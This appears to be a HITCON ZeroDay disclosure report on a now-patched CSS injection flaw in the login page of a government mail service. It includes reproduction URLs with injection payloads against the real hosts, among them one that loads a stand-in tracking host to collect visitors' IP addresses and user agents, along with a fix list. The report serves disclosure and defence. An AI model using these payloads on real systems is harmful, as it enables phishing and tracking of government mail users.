Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-00583
- Vendor: 台灣電腦網路危機處理暨協調中心(TWCERT/CC)
- Title: 政府機關Openfind MailCloud系統 登入頁面 CSS Injection 漏洞
- Introduction: CSS Injection攻擊者可注入任意 CSS 語法,進行視覺釣魚或外部資源載入攻擊。
處理狀態
目前狀態
公開
Last Update : 2026/07/07
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2026/04/26 01:37:18 : 新提交 (由 vic88 更新此狀態)
- 2026/04/26 01:38:22 : 新提交 (由 vic88 更新此狀態)
- 2026/04/26 01:50:55 : 新提交 (由 vic88 更新此狀態)
- 2026/04/27 17:51:57 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 12:31:40 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 12:31:40 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 12:31:40 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/06/26 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
- 2026/06/29 12:11:44 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/07 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-00583
- 通報者:vic88 (vic88)
- 風險:中
- 類型:其他 (Other)
參考資料
暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://es.gov.mailcloud.tw/cgi-bin/login
https://esn.gov.mailcloud.tw/cgi-bin/login
https://esn.gov.mailcloud.tw/cgi-bin/login
敘述
漏洞說明
登入頁面(/cgi-bin/login)接受 user_domain 的GET 參數,並將其值直接反射至 HTML 的 <style> 區塊中,未對 CSS 跳脫字元(如 '、)、})進行過濾或跳脫,導致攻擊者可注入任意 CSS 規則。
重現方法
1.確認問題
https://es.gov.mailcloud.tw/cgi-bin/login?user_domain=test123
觀看原始碼可發現
<style>
html {
background-image: url('/cgi-bin/login_portal/background?t=1653468030&user_domain=test123');
}
被注入到css部分。
可以看到內容變成紅色了
2.可注入任意css規則
https://es.gov.mailcloud.tw/cgi-bin/login?user_domain=x');%20}%20*%20{color:red%20!important;}%20html%20{x:url('y
進入網頁可發現字體顏色被變更。
3.外部資源載入
https://es.gov.mailcloud.tw/cgi-bin/login?user_domain=x')%20no-repeat;%20background:url('https://test.com/track
上述網址為範例,但經測試後可發現確實可行,受害者瀏覽器會主動向攻擊者伺服器發送 HTTP Request,攻擊者可蒐集受害者 IP、User-Agent 等資訊。
使用者點擊連結
網頁載入,即可追蹤到使用者資料
影響
| 可構造多種惡意css語法,可能導致多方面的風險,以下列舉部分。 | 攻擊手法 | 說明 |
|---|---|---|
| 視覺釣魚 | 隱藏原登入表單,偽造假登入 UI | |
| 外部資源載入 | 受害者 IP / User-Agent 洩漏 | |
| 信任問題 | 官方網域下可顯示任意內容 |
攻擊者只需將惡意 URL 傳送給受害者,受害者點擊後即在官方網域下看到被竄改的登入頁面,且此為政府使用之郵件系統。
修補建議
1. **驗證user_domain**:user_domain 只允許合法 domain 格式
2. **CSS 跳脫**:若需反射至 CSS context, 對 `'`、`"`、`)`、`}`、`;` 等字元進行跳脫
3. **伺服器端驗證**:比對 user_domain 是否在已知清單中,拒絕任意構造值
4. **CSP Header**:加入 Content-Security-Policy,限制外部資源載入來源
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。